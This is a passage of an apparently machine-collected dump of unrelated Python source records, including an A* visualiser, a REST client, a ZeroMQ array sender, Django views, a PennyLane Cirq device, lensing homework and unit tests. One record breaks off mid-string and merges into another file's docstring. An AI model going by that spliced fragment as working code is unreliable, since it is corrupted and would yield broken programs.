the problem as a figure\r\n path_map = np.zeros((self.map_size[0],self.map_size[1],3))\r\n path_map[self.start_point[0],self.start_point[1],1]=255\r\n path_map[self.end_point[0],self.end_point[1],1]=255\r\n path_map[:,:,0]=self.cost_map\r\n\r\n os.makedirs('./temp_gif', exist_ok=True)\r\n images_gif=[]\r\n #initial\r\n plt.imshow(path_map, cmap=cm.OrRd)\r\n plt.imshow(self.cost_map,cmap=cm.coolwarm, alpha=0.4)\r\n plt.axis('off')\r\n plt.tight_layout()\r\n plt.savefig('./Problem.png',dpi=100)\r\n plt.savefig('./temp_gif/result' + str(0) +'.png',dpi=100)\r\n images_gif.append(imageio.imread('./temp_gif/result' + str(0) +'.png'))\r\n plt.close()\r\n for i,pos in enumerate(path):\r\n path_map[pos[0],pos[1]]=255\r\n plt.imshow(path_map, cmap=cm.OrRd)\r\n plt.imshow(self.cost_map,cmap=cm.coolwarm, alpha=0.4)\r\n plt.axis('off')\r\n plt.tight_layout()\r\n plt.savefig('./temp_gif/result' + str(i+1) +'.png',dpi=100)\r\n images_gif.append(imageio.imread('./temp_gif/result' + str(i+1) +'.png'))\r\n plt.close()\r\n imageio.mimsave('./Result_Astar.gif',images_gif)\r\n\r\n shutil.rmtree('./temp_gif')\r\n return path\r\n\r\n","sub_path":"algorithms/astar_algorithm.py","file_name":"astar_algorithm.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"354076840","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n'''BlendNet Manager Client\n\nDescription: Manager REST client\n'''\n\nimport os\nimport json\nimport urllib # To quote the url path values\nfrom io import StringIO\n\nfrom .Client import (\n Client,\n ClientEngine,\n)\n\nclass ManagerClient(Client):\n _engine = None\n\n def __init__(self, address, cfg):\n if not ManagerClient._engine:\n ManagerClient._engine = ClientEngine(address, cfg)\n else:\n ManagerClient._engine._address = address\n ManagerClient._engine._cfg = cfg\n\n def resources(self):\n '''Get the list of agents with info'''\n res = self._engine.get('resources')\n if not res:\n return {'agents': {}}\n if not res.get('manager'):\n return {'agents': res.get('agents', {})}\n\n # Set the client ip if manager have not provided the addresses\n if not res['manager'].get('ip'):\n res['manager']['ip'] = self._engine._address\n if not res['manager'].get('internal_ip'):\n res['manager']['internal_ip'] = self._engine._address\n\n return res\n\n def agentCreate(self, agent_name, conf):\n '''Create the new agent'''\n path = 'agent/%s/config' % (urllib.parse.quote(agent_name),)\n data = json.dumps(conf)\n stream = StringIO(data)\n\n return self._engine.put(path, stream, len(data))\n\n def agentRemove(self, agent_name):\n '''Remove the agent from the manager'''\n return self._engine.delete('agent/' + urllib.parse.quote(agent_name))\n\n def agentLog(self, agent_name):\n '''Get the log information for the agent'''\n return self._engine.get('agent/%s/log' % (urllib.parse.quote(agent_name),))\n\n def calculateChecksum(self, stream):\n '''Will calculate and redurn checksum and reset stream'''\n import hashlib\n sha1_calc = hashlib.sha1()\n for chunk in iter(lambda: stream.read(1048576), b''):\n sha1_calc.update(chunk)\n stream.seek(0)\n return sha1_calc.hexdigest()\n\n def taskFilePut(self, task, file_path, rel_path):\n '''Send file to the task file'''\n if not os.path.isfile(file_path):\n print('ERROR: Unable to send not existing file \"%s\"' % file_path)\n return None\n\n size = os.path.getsize(file_path)\n\n with open(file_path, 'rb') as f:\n return self.taskFileStreamPut(task, rel_path, f, size, self.calculateChecksum(f))\n\n def taskResultDownload(self, task, result, out_path):\n '''Will download result name (preview/render) into the file'''\n return self._engine.download('task/%s/status/result/%s' % (task, result), out_path)\n","sub_path":"BlendNet/ManagerClient.py","file_name":"ManagerClient.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"299243790","text":"import numpy\nimport zmq\nimport functools\nimport uuid\nimport cv2\n\ndef array_to_msg(nparray):\n \"\"\"\n Convert a numpy ndarray to its multipart zeromq message representation.\n The return list is composed of:\n 0. The string representation of the array element type, i.e. 'float32'\n 1. The binary string representation of the shape of the array converted to a numpy array with dtype int32\n 2. The binary string representation of the array\n These informations together can be used from the receiver code to recreate\n uniquely the original array.\n @param nparray: A numpy ndarray\n @type nparray: numpy.ndarray\n @rtype: list\n @return: [dtype, shape, array]\n \"\"\"\n _shape = numpy.array(nparray.shape, dtype=numpy.int32)\n return [nparray.dtype.name.encode(),\n _shape.tobytes(),\n nparray.tobytes()]\n\ndef msg_to_array(msg):\n \"\"\"\n reverse the array_to_message function in order to recover the proper\n serialization of the array.\n @param msg: the array representation in a list as serizlized by\n array_to_msg\n @return: the numpy array\n \"\"\"\n _dtype_name = msg[0].decode()\n _shape = numpy.fromstring(msg[1], numpy.int32)\n _array = numpy.fromstring(msg[2], _dtype_name)\n return (_dtype_name, _shape, _array.reshape(tuple(_shape)))\n\ndef sender_msg_to_array(msg):\n \"\"\"\n Parse a list argument as returned by L{array_to_msg} function of this\n module, and returns the numpy array contained in the message body.\n @param msg: a list as returned by L{array_to_msg} function\n @rtype: numpy.ndarray\n @return: The numpy array contained in the message\n \"\"\"\n [_dtype, _shape, _bin_msg] = msg_to_array(msg[2:])\n _uuid = uuid.UUID(bytes=msg[0])\n _data_name = msg[1].decode()\n return (_uuid, _data_name, _dtype, _shape, _bin_msg)\n\ndef numpy_array_sender(name, endpoint, sender_id=\"\", socket_type=zmq.PUSH):\n \"\"\"\n Decorator Factory\n The decorated function will have to return a numpy array, while the\n decorator will create a zmq socket of the specified socket type connected\n to the specified endpoint.\n Each time the function is called the numpy array will be sent over the\n instantiated transport after being converted to a multipart message using\n L{array_to_msg} function. The multipart message is prepended with a UUID\n and the given name as the first two elements.\n #TODO: Would it be good to add the possibility of transimitting arbitrary\n metadata? 
--- Marco Bartolini 27/04/2012\n Usage example::\n import zmq\n import zmqnumpy\n import numpy\n @zmqnumpy.numpy_array_sender(\\\"mysender\\\", \\\"tcp://127.0.0.1:8765\\\")\n def random_array_generator(min, max, width):\n return numpy.random.randint(min, max, width)\n @type name: string\n @param name: the label of the data stream\n @type endpoint: string\n @param endpoint: a zmq endpoint made as \\\"protocol://host:port\\\"\n @param sender_id: sender identifier, if not given a uuid will be generated\n automatically\n @param socket_type: a zmq socket type such as zmq.PUSH or zmq.PUB\n \"\"\"\n _context = zmq.Context.instance()\n _socket = _context.socket(socket_type)\n _socket.connect(endpoint)\n if not sender_id:\n _uuid = uuid.uuid4().bytes\n else:\n _uuid = sender_id\n def wrapper(fn):\n @functools.wraps(fn)\n def wrapped(*args, **kwargs):\n _data = fn(*args, **kwargs)\n print(len(array_to_msg(_data)[2]))\n _socket.send_multipart([_uuid, name.encode()] + array_to_msg(_data))\n return wrapped\n return wrapper\n\n\n\ndef send():\n cap_idx = input(\"Capture Device: \")\n cap = cv2.VideoCapture(int(cap_idx), cv2.CAP_AVFOUNDATION)\n if not (cap.isOpened()):\n print(\"could not open device\")\n exit()\n\n @numpy_array_sender(\"mysender\", \"tcp://127.0.0.1:8765\")\n def frameYielder():\n nonlocal cap\n ret, frame = cap.read()\n print(frame.shape)\n return frame\n for _ in range(1000):\n frameYielder()\n \n \n cap.release()\n \nif __name__ == \"__main__\":\n send()","sub_path":"zmq_tests/fast.py","file_name":"fast.py","file_ext":"py","file_size_in_byte":4159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
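+The record above defines only the sending side; a minimal receiving counterpart, assuming the five-frame layout [uuid, name, dtype, shape, data] that the decorated sender emits (the endpoint matches the record's usage example, and the function name is made up):
+```python
+import zmq
+import numpy
+
+def recv_named_array(endpoint="tcp://127.0.0.1:8765"):
+    # Bind a PULL socket to pair with the PUSH sender in the record
+    context = zmq.Context.instance()
+    socket = context.socket(zmq.PULL)
+    socket.bind(endpoint)
+    frames = socket.recv_multipart()  # [uuid, name, dtype, shape, data]
+    dtype_name = frames[2].decode()
+    shape = numpy.frombuffer(frames[3], numpy.int32)
+    array = numpy.frombuffer(frames[4], dtype_name).reshape(tuple(shape))
+    return frames[1].decode(), array
+```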
+{"seq_id":"53294298","text":"from django.shortcuts import render_to_response\nfrom django.contrib.auth.decorators import login_required\n\nfrom formtools.wizard.views import SessionWizardView\n\nfrom .models import Report, ProtectedClass\nfrom .model_variables import PROTECTED_CLASS_CODES\n\n\n@login_required\ndef IndexView(request):\n latest_reports = Report.objects.order_by('-create_date')\n data = []\n # formatting protected class\n for report in latest_reports:\n p_class_list = []\n for p_class in report.protected_class.all().order_by('form_order'):\n if p_class.protected_class is not None:\n code = PROTECTED_CLASS_CODES.get(p_class.protected_class, p_class.protected_class)\n if code != 'Other':\n p_class_list.append(code)\n # If this code is other but there is no other_class description, we want it to say \"Other\". If there is an other_class that will take the place of \"Other\"\n elif report.other_class is None:\n p_class_list.append(code)\n\n if report.other_class:\n p_class_list.append(report.other_class)\n if len(p_class_list) > 3:\n p_class_list = p_class_list[:3]\n p_class_list[2] = f'{p_class_list[2]}...'\n data.append({\n \"report\": report,\n \"report_protected_classes\": p_class_list\n })\n\n return render_to_response('forms/index.html', {'data_dict': data})\n\n\nTEMPLATES = [\n # Contact\n 'forms/report_grouped_questions.html',\n # Protected Class\n 'forms/report_class.html',\n # Details\n 'forms/report_details.html',\n]\n\n\nclass CRTReportWizard(SessionWizardView):\n \"\"\"Once all the sub-forms are submitted this class will clean data and save.\"\"\"\n def get_template_names(self):\n return [TEMPLATES[int(self.steps.current)]]\n\n def get_context_data(self, form, **kwargs):\n context = super(CRTReportWizard, self).get_context_data(form=form, **kwargs)\n\n # This name appears in the progress bar wizard\n ordered_step_names = [\n 'Contact',\n 'Protected Class',\n 'Details',\n # 'What Happened',\n # 'Where',\n # 'Who',\n ]\n current_step_name = ordered_step_names[int(self.steps.current)]\n\n # This title appears in large font above the question elements\n ordered_step_titles = [\n 'Contact',\n 'Please provide details',\n 'Details'\n ]\n current_step_title = ordered_step_titles[int(self.steps.current)]\n\n context.update({\n 'ordered_step_names': ordered_step_names,\n 'current_step_title': current_step_title,\n 'current_step_name': current_step_name\n })\n\n if current_step_name == 'Details':\n context.update({\n 'page_subtitle': 'Please describe what happened in your own words',\n 'page_note': 'Continued'\n })\n\n return context\n\n def done(self, form_list, form_dict, **kwargs):\n form_data_dict = self.get_all_cleaned_data()\n m2mfield = form_data_dict.pop('protected_class')\n r = Report.objects.create(**form_data_dict)\n\n # Many to many fields need to be added or updated to the main model, with a related manager such as add() or update()\n for protected in m2mfield:\n p = ProtectedClass.objects.get(protected_class=protected)\n r.protected_class.add(p)\n\n r.save()\n # adding this back for the save page results\n form_data_dict['protected_class'] = m2mfield.values()\n\n return render_to_response('forms/confirmation.html', {'data_dict': form_data_dict})\n","sub_path":"crt_portal/cts_forms/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"617392195","text":"def zfill(s):\r\n #fungsi ini untuk menambahkan satu angka 0 pada string s\r\n #digunakan terutama untuk representasi penanggalan bagi hari / bulan\r\n #prekondisi: s haruslah literal string yang hanya berisi angka\r\n \r\n if len(s) == 1:\r\n s = '0' + s\r\n #selain berjumlah karakter sama dengan satu, tidak akan diutak-atik\r\n\r\n return s\r\n#-----------------------------------------------------------------------\r\ndef FormShow(form, parameter):\r\n uip = form.GetUIPartByName('uipUserInfo')\r\n uipFilter = form.GetUIPartByName('uipFilter')\r\n \r\n if uip.isBackOffice:\r\n #matikan lookup branch\r\n form.GetControlByName('pFilter.LBranch').Enabled = 0\r\n \r\ndef bTampilkanClick(sender):\r\n uip = sender.OwnerForm.GetUIPartByName('uipUserInfo')\r\n uipFilter = sender.OwnerForm.GetUIPartByName('uipFilter')\r\n\r\n awalTanggal = uipFilter.GetFieldValue('AwalTanggal')\r\n akhirTanggal = uipFilter.GetFieldValue('AkhirTanggal')\r\n\r\n #cek branch code\r\n if uipFilter.GetFieldValue('LBranch.branch_code') == None or \\\r\n uipFilter.GetFieldValue('LBranch.branch_code') == '':\r\n sender.OwnerForm.ShowMessage('Kode dan Nama Cabang belum dipilih, mohon untuk dipilih dahulu!')\r\n return\r\n\r\n #cek rentang tanggal filter\r\n if (awalTanggal[:3] > akhirTanggal[:3]):\r\n sender.OwnerForm.ShowMessage('Rentang tanggal filter salah, mohon untuk dibetulkan dahulu.')\r\n return\r\n\r\n #Daftar transaksi DPLK biasa sudah terotorisasi\r\n #sementara pake nama variable yang agak aneh\r\n sNotAuthCondition = 'isCommitted = \\'T\\' and'\r\n\r\n if uip.isBackOffice:\r\n #bakcoffice user\r\n sCondition = 'branch_code = \\'%s\\' and' % (uip.BranchCode)\r\n else:\r\n #maybe ROOT or ADMIN user\r\n sCondition = 'branch_code = \\'%s\\' and' \\\r\n % (uipFilter.GetFieldValue('LBranch.branch_code'))\r\n\r\n #set parameter OQL and show it\r\n query = sender.OwnerForm.GetPanelByName('qTransaksi')\r\n query.OQLText = 'select from TransaksiDPLK [%s %s ' \\\r\n 'tgl_transaksi >= :tanggal_awal and tgl_transaksi <= :tanggal_akhir] ' \\\r\n '(tgl_transaksi as Tanggal_Transaksi, ' \\\r\n 'no_peserta as Nomor_Peserta, ' \\\r\n 'LJenisTransaksiDPLK.nama_transaksi as Kode_Jenis_Transaksi, ' \\\r\n 'branch_code as Kode_Cabang, ' \\\r\n 'isCommitted as Status_Otorisasi, ' \\\r\n 'tgl_otorisasi as Tanggal_Otorisasi, ' \\\r\n 'keterangan as Keterangan, ' \\\r\n 'LTransactionBatch.ID_TransactionBatch as idbatch, ' \\\r\n 'LTransactionBatch.no_batch as nobatch, ' \\\r\n 'ID_Transaksi,' \\\r\n 'kode_jenis_transaksi as hidden_kode_Jenis_Transaksi, ' \\\r\n 'self) then order by Tanggal_Transaksi;' % (sCondition, sNotAuthCondition)\r\n\r\n #setting date untuk OQL: mm/dd/yyyy\r\n awalTanggal = '%s/%s/%d' % (zfill(str(awalTanggal[1])), \\\r\n zfill(str(awalTanggal[2])),awalTanggal[0])\r\n\r\n akhirTanggal = '%s/%s/%d' % (zfill(str(akhirTanggal[1])), \\\r\n zfill(str(akhirTanggal[2])),akhirTanggal[0])\r\n \r\n query.SetParameter('tanggal_awal',awalTanggal)\r\n query.SetParameter('tanggal_akhir',akhirTanggal)\r\n \r\n query.DisplayData()\r\n","sub_path":"dialogs/transaksi/OLD_Form/fDaftarTransaksiDPLKTerotorisasi_intr.py","file_name":"fDaftarTransaksiDPLKTerotorisasi_intr.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"42865758","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sys\n\nnnx = 514\nnny = 514\nnnz = 257\nhead = (\"head\",\"= 1.\n qubits (List[cirq.Qubit]): a list of Cirq qubits that are used\n as wires. The wire number corresponds to the index in the list.\n By default, an array of ``cirq.LineQubit`` instances is created.\n \"\"\"\n\n name = \"Cirq Abstract PennyLane plugin baseclass\"\n pennylane_requires = \">=0.9.0\"\n version = __version__\n author = \"Xanadu Inc\"\n _capabilities = {\n \"model\": \"qubit\",\n \"tensor_observables\": True,\n \"inverse_operations\": True,\n }\n\n short_name = \"cirq.base_device\"\n\n def __init__(self, wires, shots, analytic, qubits=None):\n super().__init__(wires, shots, analytic)\n\n self.circuit = None\n\n if qubits:\n if wires != len(qubits):\n raise qml.DeviceError(\n \"The number of given qubits and the specified number of wires have to match. Got {} wires and {} qubits.\".format(\n wires, len(qubits)\n )\n )\n\n self.qubits = qubits\n else:\n self.qubits = [cirq.LineQubit(wire) for wire in range(wires)]\n\n # Add inverse operations\n self._inverse_operation_map = {}\n for key in self._operation_map:\n if not self._operation_map[key]:\n continue\n\n # We have to use a new CirqOperation instance because .inv() acts in-place\n inverted_operation = CirqOperation(self._operation_map[key].parametrization)\n inverted_operation.inv()\n\n self._inverse_operation_map[key + Operation.string_for_inverse] = inverted_operation\n\n self._complete_operation_map = {\n **self._operation_map,\n **self._inverse_operation_map,\n }\n\n _operation_map = {\n \"BasisState\": None,\n \"QubitStateVector\": None,\n \"QubitUnitary\": CirqOperation(cirq.MatrixGate),\n \"PauliX\": CirqOperation(lambda: cirq.X),\n \"PauliY\": CirqOperation(lambda: cirq.Y),\n \"PauliZ\": CirqOperation(lambda: cirq.Z),\n \"Hadamard\": CirqOperation(lambda: cirq.H),\n \"S\": CirqOperation(lambda: cirq.S),\n \"T\": CirqOperation(lambda: cirq.T),\n \"CNOT\": CirqOperation(lambda: cirq.CNOT),\n \"SWAP\": CirqOperation(lambda: cirq.SWAP),\n \"CZ\": CirqOperation(lambda: cirq.CZ),\n \"PhaseShift\": CirqOperation(lambda phi: cirq.ZPowGate(exponent=phi / np.pi)),\n \"RX\": CirqOperation(cirq.rx),\n \"RY\": CirqOperation(cirq.ry),\n \"RZ\": CirqOperation(cirq.rz),\n \"Rot\": CirqOperation(lambda a, b, c: [cirq.rz(a), cirq.ry(b), cirq.rz(c)]),\n \"CRX\": CirqOperation(lambda phi: cirq.ControlledGate(cirq.rx(phi))),\n \"CRY\": CirqOperation(lambda phi: cirq.ControlledGate(cirq.ry(phi))),\n \"CRZ\": CirqOperation(lambda phi: cirq.ControlledGate(cirq.rz(phi))),\n \"CRot\": CirqOperation(\n lambda a, b, c: [\n cirq.ControlledGate(cirq.rz(a)),\n cirq.ControlledGate(cirq.ry(b)),\n cirq.ControlledGate(cirq.rz(c)),\n ]\n ),\n \"CSWAP\": CirqOperation(lambda: cirq.CSWAP),\n \"Toffoli\": CirqOperation(lambda: cirq.TOFFOLI),\n }\n\n _observable_map = {\n \"PauliX\": None,\n \"PauliY\": None,\n \"PauliZ\": None,\n \"Hadamard\": None,\n \"Hermitian\": None,\n \"Identity\": None,\n }\n\n def reset(self):\n # pylint: disable=missing-function-docstring\n super().reset()\n\n self.circuit = cirq.Circuit()\n\n @property\n def observables(self):\n # pylint: disable=missing-function-docstring\n return set(self._observable_map.keys())\n\n @property\n def operations(self):\n # pylint: disable=missing-function-docstring\n return set(self._operation_map.keys())\n\n @abc.abstractmethod\n def _apply_basis_state(self, basis_state_operation):\n \"\"\"Apply a basis state preparation.\n\n Args:\n 
basis_state_operation (pennylane.BasisState): the BasisState operation instance that shall be applied\n\n Raises:\n NotImplementedError: when not implemented in the subclass\n \"\"\"\n raise NotImplementedError\n\n @abc.abstractmethod\n def _apply_qubit_state_vector(self, qubit_state_vector_operation):\n \"\"\"Apply a state vector preparation.\n\n Args:\n qubit_state_vector_operation (pennylane.QubitStateVector): the QubitStateVector operation instance that shall be applied\n\n Raises:\n NotImplementedError: when not implemented in the subclass\n \"\"\"\n raise NotImplementedError\n\n def _apply_operation(self, operation):\n \"\"\"Apply a single PennyLane Operation.\n\n Args:\n operation (pennylane.Operation): The operation that shall be applied\n \"\"\"\n cirq_operation = self._complete_operation_map[operation.name]\n\n # If command is None do nothing\n if cirq_operation:\n cirq_operation.parametrize(*operation.parameters)\n\n self.circuit.append(\n cirq_operation.apply(*[self.qubits[wire] for wire in operation.wires])\n )\n\n def apply(self, operations, **kwargs):\n # pylint: disable=missing-function-docstring\n rotations = kwargs.pop(\"rotations\", [])\n\n for i, operation in enumerate(operations):\n if i > 0 and operation.name in {\"BasisState\", \"QubitStateVector\"}:\n raise qml.DeviceError(\n \"The operation {} is only supported at the beginning of a circuit.\".format(\n operation.name\n )\n )\n\n if operation.name == \"BasisState\":\n self._apply_basis_state(operation)\n elif operation.name == \"QubitStateVector\":\n self._apply_qubit_state_vector(operation)\n else:\n self._apply_operation(operation)\n\n # TODO: get pre rotated state here\n\n # Diagonalize the given observables\n for operation in rotations:\n self._apply_operation(operation)\n","sub_path":"pennylane_cirq/cirq_device.py","file_name":"cirq_device.py","file_ext":"py","file_size_in_byte":7576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
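+CirqOperation itself is imported from elsewhere in the package and is not shown in the record above; a minimal sketch of the deferred-parametrization pattern the device relies on (an illustration under that assumption, not the package's actual class):
+```python
+import cirq
+
+class LazyOperation:
+    """Hold a parametrization; build concrete gates only when parameters arrive."""
+    def __init__(self, parametrization):
+        self.parametrization = parametrization  # callable returning a gate or a list of gates
+        self.gates = None
+
+    def parametrize(self, *args):
+        gates = self.parametrization(*args)
+        self.gates = gates if isinstance(gates, list) else [gates]
+
+    def apply(self, *qubits):
+        # Bind the prepared gates to concrete qubits, as _apply_operation does
+        return [gate.on(*qubits) for gate in self.gates]
+
+op = LazyOperation(cirq.rx)         # same shape as the "RX" entry in _operation_map
+op.parametrize(0.5)
+print(op.apply(cirq.LineQubit(0)))  # [cirq.rx(0.5).on(cirq.LineQubit(0))]
+```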
+{"seq_id":"571064079","text":"class Solution:\n def canReach(self, arr: List[int], start: int) -> bool:\n visited, q = set(), set([start]) #Inialize visited set which is empty and queue set which contains only start index. \n while q: #BFS.\n nextq = set() #Initialize next queue set.\n visited |= q #Union visited set with q set so all index in q are visited.\n for x in q: #Iterate through queue set.\n if not arr[x]: #If the value in current index is 0, return true.\n return True\n right, left = x + arr[x], x - arr[x] #Get the indexes after jump right and jump left.\n if right < len(arr) and right not in visited: #If jump right to an unvisited index, add the new index to next queue.\n nextq.add(right)\n if left >= 0 and left not in visited: #If jump right to an unvisited index, add the new index to next queue.\n nextq.add(left)\n q = nextq #Replace queue with next queue.\n return False ","sub_path":"problems/jump_game_iii/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"321791597","text":"# Realizar un programa que pida la cantidad de iteracciones y que muestre en cada interaccion un mensaje diferente\nclass Mensajes:\n \"\"\"docstring for Mensajes.\"\"\"\n def __init__(self):\n super(Mensajes, self).__init__()\n self.n = int(input('Iteraciones: '))\n self.iteraciones()\n def iteraciones(self):\n for i in range(self.n):\n if i%2:\n print('asdasdasd')\n else:\n print('wadawdgxd')\nm = Mensajes()\n","sub_path":"second/second/iterativos.py","file_name":"iterativos.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"230137237","text":"import rootfinder\nimport interpolation\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport astropy.units as u\nfrom astropy import constants as const\n\nplt.rc(\"font\" , size = 13)\n\ndef\tf(t):\n\t'''\n\tThis function returns N_e(t) for the pseudo-isothermal sphere\n\tTakes in a number t which is equal to x / r_c\n\t'''\n\treturn (1 + t ** 2) ** (-0.5) - .5\n\ndef fprime(t):\n\t'''\n\tThis function returns the derivative of N_e(t) with respect to t\n\tThis is meant to be used with the Newton method\n\tAs above, t = x / r_c\n\t'''\n\t\n\treturn -1 * t / ((1 + t ** 2) ** 1.5)\n\t\n\t\ndef gausslens(wlength , N0 , D , a):\n\t'''\n\tThis is the lense equation given for the gaussian lens.\n\tTakes in several parameters of the lense.\n\twlength is a wavelength, N0 is the central column density, a is a characteristic size\n\tD is the distance to the lense\n\treturns a function of x that rturns x prime\n\t'''\n\t\n\t#re = const.e.esu ** 2 / (const.m_e * const.c ** 2)\n\tre = 2.817940328e-15 * u.m\n\treturn lambda x: x * (1 + ((wlength ** 2 * N0 * re * D) /(np.pi * a * a)) * np.exp(-((x / a) ** 2)))\n\t\ndef isothermallens(wlength , N0 , D , rc):\n\t'''\n\tThis is the lense equation for the isothermal lens.\n\tTakes in several parameters of the lense.\n\twlength is a wavelength, N0 is the central column density, rc is a characteristic size\n\tD is the distance to the lense\n\treturns a function of x that rturns x prime\n\t'''\n\tre = 2.817940328e-15 * u.m\n\tc = (((wlength ** 2 * re) / (2 * np.pi))) ###theta_r = c * d/dx N_e(x)\n\ttheta_r = lambda x: c * (N0 * x * -1) / (rc ** 2 * (1 + (x / rc) ** 2) ** 1.5)\n\t\n\n\treturn lambda x: (x + D * theta_r(x))\n\t\ndef ray_tracing(L , spacing , xlow , xhigh):\n\t'''\n\tProduces a ray tracing plot, like on the first page of the HW.\n\tL should be a function of x that returns x prime\n\tSuch a function caan be produces using gausslens or isothermallens\n\tspacing is the space between incoming rays\n\txlow and xhigh are the lowest and highest x values for the incoming rays\n\tNo returns\n\t'''\n\t\n\tspacing *= u.au\n\tx = xlow * u.au\n\t\n\t\n\twhile x.value < xhigh:\n\t\tplt.plot([x.value , L(x).value] , [1 , 0] , color = 'b' , linewidth = .5)\n\t\t\n\t\tx += spacing\n\t\t\n\tplt.xlabel(\"x (AU)\")\n\tplt.ylabel(\"Distance (Kpc)\")\n\tplt.show()\n\t\t\n\t\n\t\ndef problem_3():\n\t\n\t'''\n\tMy code for problem 3. 
This will determine the FWHM and produce the desired plots.\n\tNo returns\n\tWill produce a plot\n\t'''\n\tthresh = 1\n\tth = []\n\tbi_iter = []\n\ts_iter = []\n\tn_iter = []\n\twhile thresh > 1e-10: ###loop generates data for our plots\n\t\n\t\tb_value , b_niter = rootfinder.bisection(f , -5 , 0 , thresh, True) #bisection method\n\t\t\n\t\ts_value , s_niter = rootfinder.Secant(f , -5 , 0 , thresh, True) #Secant method\n\t\t\n\t\tnv , ni = rootfinder.Newton(f , fprime , -5 , thresh , True) #Newton method\n\t\t\n\t\tth.append(np.log10(thresh))\n\t\tbi_iter.append(b_niter)\n\t\tn_iter.append(ni)\n\t\ts_iter.append(s_niter)\n\t\t\n\t\tthresh /=1.5 #lowers threshold\n\t\t\n\t###Now we plot the results\n\tplt.plot(th , bi_iter , label = \"Bisection\")\n\tplt.plot(th , s_iter , label = \"Secant\")\n\tplt.plot(th , n_iter , label = \"Newton\")\n\tplt.legend()\n\tplt.xlabel(\"log(threshold)\")\n\tplt.ylabel(\"Number of Iterations\")\n\tplt.show()\n\t\n\t###Print out the value of the root found\n\tprint (nv , b_value , s_value)\n\t\ndef problem_4():\n\tD = 1 * u.kpc\n\ta = 1 * u.au\n\tlamb = 21 * u.cm\n\tN_0 = .01 * u.pc / (u.cm ** 3)\n\trc = 1 * u.au\n\t\n\tGL = gausslens(lamb , N_0 , D , a)\n\tray_tracing(GL , .1 , -8 , 8)\n\t\n\tIL = isothermallens(lamb , N_0 , D , rc)\n\tray_tracing(IL , .075 , -4 , 4)\n\t\n\t\n\t\t\nproblem_3()\nproblem_4()\n","sub_path":"HW1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
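+The rootfinder module used above is not part of the record; a sketch of a Newton iteration matching the call signature rootfinder.Newton(f, fprime, x0, thresh, True) inferred from the call site (the real module may differ):
+```python
+def Newton(f, fprime, x0, thresh, return_iters=False):
+    # Iterate x -> x - f(x)/f'(x) until |f(x)| falls below the threshold
+    x, niter = x0, 0
+    while abs(f(x)) > thresh:
+        x = x - f(x) / fprime(x)
+        niter += 1
+    return (x, niter) if return_iters else x
+```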
+{"seq_id":"539987437","text":"import unittest\nfrom task08 import Point2D, Rectangle, Square, Circle, Shape2DCollection\n\n\nclass TestTask08(unittest.TestCase):\n def getPoint2D(self):\n return Point2D(1, 2)\n\n def test_rectangle_includes_point2D(self):\n point2D = Point2D(4, 9)\n rectangle = Rectangle(self.getPoint2D(), 3, 9)\n self.assertIn(point2D, rectangle)\n\n def test_rectangle_not_includes_point2D(self):\n point2D = Point2D(40, 90)\n rectangle = Rectangle(self.getPoint2D(), 3, 9)\n self.assertFalse(point2D in rectangle)\n\n def test_rectangle_area(self):\n rectangle = Rectangle(self.getPoint2D(), 3, 9)\n self.assertEqual(rectangle.area, 27)\n\n def test_square_includes_point2D(self):\n square = Square(self.getPoint2D(), 8)\n self.assertIn(self.getPoint2D(), square)\n\n def test_square_not_includes_point2D(self):\n point2D = Point2D(1, 1)\n square = Square(self.getPoint2D(), 7)\n self.assertFalse(point2D in square)\n\n def test_square_area(self):\n square = Square(self.getPoint2D(), 21)\n self.assertEqual(square.area, 441)\n\n def test_circle_includes_point2D(self):\n square = Square(self.getPoint2D(), 17)\n self.assertIn(self.getPoint2D(), square)\n\n def test_circle_not_includes_point2D(self):\n point2D = Point2D(6, 90)\n square = Square(self.getPoint2D(), 72)\n self.assertFalse(point2D in square)\n\n def test_square_circle(self):\n circle = Circle(self.getPoint2D(), 34)\n self.assertEqual(circle.area, 3631.681107549801)\n\n def test_point_in_shape2DCollection(self):\n point2D = Point2D(5, 8)\n circle = Circle(self.getPoint2D(), 40)\n rectangle = Rectangle(self.getPoint2D(), 3, 9)\n square = Square(self.getPoint2D(), 30)\n shape2DCollection = Shape2DCollection()\n shape2DCollection.add(circle)\n shape2DCollection.add(rectangle)\n shape2DCollection.add(square)\n self.assertIn(point2D, shape2DCollection)\n\n def test_point_not_in_shape2DCollection(self):\n point2D = Point2D(31, 65)\n circle = Circle(self.getPoint2D(), 42)\n rectangle = Rectangle(self.getPoint2D(), 3, 9)\n square = Square(self.getPoint2D(), 30)\n shape2DCollection = Shape2DCollection()\n shape2DCollection.add(circle)\n shape2DCollection.add(rectangle)\n shape2DCollection.add(square)\n self.assertFalse(point2D in shape2DCollection)\n\n def test_square_shape2DCollection(self):\n circle = Circle(self.getPoint2D(), 62)\n rectangle = Rectangle(self.getPoint2D(), 3, 9)\n square = Square(self.getPoint2D(), 7)\n shape2DCollection = Shape2DCollection()\n shape2DCollection.add(circle)\n shape2DCollection.add(rectangle)\n shape2DCollection.add(square)\n self.assertEqual(shape2DCollection.area, 12152.282160399165)\n\n\nif __name__ == '__main__':\n 